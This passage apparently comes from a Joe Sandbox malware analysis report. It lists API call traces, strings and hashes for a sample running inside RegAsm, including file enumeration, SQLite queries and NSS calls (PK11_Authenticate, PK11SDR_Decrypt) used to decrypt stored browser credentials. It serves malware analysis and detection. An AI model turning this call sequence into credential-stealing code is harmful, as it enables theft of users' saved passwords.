                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: _EH_prolog.MSVCRT ref: 00412DC2
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: memset.MSVCRT ref: 00412DE3
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: memset.MSVCRT ref: 00412DF1
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: lstrcat.KERNEL32(?,00000000), ref: 00412E1D
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: lstrcat.KERNEL32(?), ref: 00412E3B
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: lstrcat.KERNEL32(?,?), ref: 00412E4F
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: lstrcat.KERNEL32(?), ref: 00412E62
                                                                                                                                                                                                                                                                    • Part of subcall function 00412DBD: StrStrA.SHLWAPI(00000000), ref: 00412EFC
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00416147
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00416156
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0041617B
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 0041618E
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00416197
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 004161A4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$H_prolog$lstrcpy$Findlstrlen$FileHeapmemsetwsprintf$AllocCloseFirstNextProcessSystemTime
                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\*
                                                                                                                                                                                                                                                                  • API String ID: 398052587-2848263008
                                                                                                                                                                                                                                                                  • Opcode ID: 7a98332b4077d446cd62e0c1e3c4a94eae42174cdc75846332ee3e5d05188201
                                                                                                                                                                                                                                                                  • Instruction ID: 5b2bfe7850d0d26085d3f59bcdd678c2daf311e468f9b5f5882da7259ac5939b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a98332b4077d446cd62e0c1e3c4a94eae42174cdc75846332ee3e5d05188201
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16817E71D00259AFDF10EBE4DC49BEEBB78AF15304F10406AF515B3191EB785688CB65
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C901C6B
                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C901C75
                                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C901CA1
                                                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 6C901CA9
                                                                                                                                                                                                                                                                  • malloc.MOZGLUE(00000000), ref: 6C901CB4
                                                                                                                                                                                                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C901CCC
                                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C901CE4
                                                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 6C901CEC
                                                                                                                                                                                                                                                                  • malloc.MOZGLUE(00000000), ref: 6C901CFD
                                                                                                                                                                                                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C901D0F
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 6C901D17
                                                                                                                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32 ref: 6C901D4D
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 6C901D73
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C901D7F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C901D7A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                                                                                                                                                                                                  • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                                                                                                                                                                                                  • API String ID: 3748115541-1216436346
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8B1D58
                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8B1EFD
                                                                                                                                                                                                                                                                  • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C8B1FB7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • abort due to ROLLBACK, xrefs: 6C8B2223
                                                                                                                                                                                                                                                                  • unknown error, xrefs: 6C8B2291
                                                                                                                                                                                                                                                                  • sqlite_master, xrefs: 6C8B1C61
                                                                                                                                                                                                                                                                  • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C8B1F83
                                                                                                                                                                                                                                                                  • sqlite_temp_master, xrefs: 6C8B1C5C
                                                                                                                                                                                                                                                                  • table, xrefs: 6C8B1C8B
                                                                                                                                                                                                                                                                  • unsupported file format, xrefs: 6C8B2188
                                                                                                                                                                                                                                                                  • no more rows available, xrefs: 6C8B2264
                                                                                                                                                                                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 6C8B20CA
                                                                                                                                                                                                                                                                  • another row available, xrefs: 6C8B2287
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                                                                                                                                                  • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                                                                                                                                                  • API String ID: 563213449-2102270813
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6C93FD06
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6C93F696
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6C93F789
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6C93F796
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6C93F79F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C93F670: SECITEM_DupItem_Util.NSS3 ref: 6C93F7F0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C963440: PK11_GetAllTokens.NSS3 ref: 6C963481
                                                                                                                                                                                                                                                                    • Part of subcall function 6C963440: PR_SetError.NSS3(00000000,00000000), ref: 6C9634A3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C963440: TlsGetValue.KERNEL32 ref: 6C96352E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C963440: EnterCriticalSection.KERNEL32(?), ref: 6C963542
                                                                                                                                                                                                                                                                    • Part of subcall function 6C963440: PR_Unlock.NSS3(?), ref: 6C96355B
                                                                                                                                                                                                                                                                  • SECITEM_DupItem_Util.NSS3(?), ref: 6C93FDAD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C919003,?), ref: 6C96FD91
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FD80: PORT_Alloc_Util.NSS3(A4686C97,?), ref: 6C96FDA2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C97,?,?), ref: 6C96FDC4
                                                                                                                                                                                                                                                                  • SECITEM_DupItem_Util.NSS3(?), ref: 6C93FE00
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FD80: free.MOZGLUE(00000000,?,?), ref: 6C96FDD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C95E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C95E5A0
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C93FEBB
                                                                                                                                                                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C93FEC8
                                                                                                                                                                                                                                                                  • PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6C93FED3
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C93FF0C
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C93FF23
                                                                                                                                                                                                                                                                  • PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6C93FF4D
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C93FFDA
                                                                                                                                                                                                                                                                  • PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6C940007
                                                                                                                                                                                                                                                                  • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C940029
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C940044
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 138705723-0
                                                                                                                                                                                                                                                                  • Opcode ID: d1d3e2bb62ab540989365a79c87243dd595e51bbe2cd51554e78073b70592175
                                                                                                                                                                                                                                                                  • Instruction ID: 147a0807f24e0f9c954a0ad6d4d59a89e1e0a978256a192d2c0b7aa35bdda547
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1d3e2bb62ab540989365a79c87243dd595e51bbe2cd51554e78073b70592175
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8B1D1B1604211AFE314CF29CC40A6AB7E5FF9830CF548A6DF99D97A81E730E954CB91
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040A9D9
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0040AA02
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040AA19
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425EE4), ref: 0040AA36
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425EE8), ref: 0040AA50
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00425C2A,00000000,?,?,?,00425EEC,?,?,00425C27), ref: 0040AB00
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040AF97
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040AFA6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitwsprintf
                                                                                                                                                                                                                                                                  • String ID: #$%s\*.*
                                                                                                                                                                                                                                                                  • API String ID: 1095930517-2760317471
                                                                                                                                                                                                                                                                  • Opcode ID: 296e209a0fa391053453af33cbaa6bc495bfdb0432aa7fa96c6bbdde4ce6bcd7
                                                                                                                                                                                                                                                                  • Instruction ID: 5591a32c6147e38e69519f51dc30b330cf61ad29ea70fe83c02adb92ca8483ef
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 296e209a0fa391053453af33cbaa6bc495bfdb0432aa7fa96c6bbdde4ce6bcd7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61025D7190024CEADF15EBA5C846BDEBB78AF15318F1440BAE509B35C2DB781B4CCB66
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C961F19
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C962166
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C96228F
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C9623B8
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C96241C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$Error
                                                                                                                                                                                                                                                                  • String ID: manufacturer$model$serial$token
                                                                                                                                                                                                                                                                  • API String ID: 3204416626-1906384322
                                                                                                                                                                                                                                                                  • Opcode ID: cd50dec81c190a856c9d93220a7cf2373dbdd8dc5cbe49d63a3e653837b66868
                                                                                                                                                                                                                                                                  • Instruction ID: a2177a9126409aca3e411c8657914e3e92bf62f339a7434885a7fa9f86391e9b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd50dec81c190a856c9d93220a7cf2373dbdd8dc5cbe49d63a3e653837b66868
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84022E72D0CBC86EF7358272C54D7D76AA89B46328F0D166EC5DE46EC3C3B899888351
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C911C6F,00000000,00000004,?,?), ref: 6C966C3F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C911C6F,00000000,00000004,?,?), ref: 6C966C60
                                                                                                                                                                                                                                                                  • PR_ExplodeTime.NSS3(00000000,6C911C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C911C6F,00000000,00000004,?,?), ref: 6C966C94
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                                                                  • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                                  • API String ID: 3534712800-180463219
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408358
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(0040865D,00000001,?,00000014,00000000,00000000,?,0040865D,00000014), ref: 00408372
                                                                                                                                                                                                                                                                  • CryptStringToBinaryA.CRYPT32(0040865D,00000000,?,0040865D,00000014), ref: 0040837C
                                                                                                                                                                                                                                                                  • PK11_GetInternalKeySlot.NSS3(?,0040865D,00000014), ref: 0040838A
                                                                                                                                                                                                                                                                  • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,0040865D,00000014), ref: 0040839F
                                                                                                                                                                                                                                                                  • PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 004083CA
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004083E4
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00425BDF,00425BE3), ref: 0040840B
                                                                                                                                                                                                                                                                  • PK11_FreeSlot.NSS3(?), ref: 00408414
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00425BDF,00425BE6), ref: 00408423
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2251291257-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00409958
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00425BFE,00000000,75B0AC90), ref: 004099B7
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425E34), ref: 004099D4
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425E38), ref: 004099EE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00409F5A
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00409F69
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                                  • String ID: "$\*.*
                                                                                                                                                                                                                                                                  • API String ID: 1275501236-2874818444
                                                                                                                                                                                                                                                                  • Opcode ID: 4d4b4cbfe08da6415348f3d4d0d959f0bcd8a4a06266aefb0e3acec25f657d7d
                                                                                                                                                                                                                                                                  • Instruction ID: bc138630e58538e096eedcb1e8ab2578a0b0f2b81e8206e02c277311e92657fa
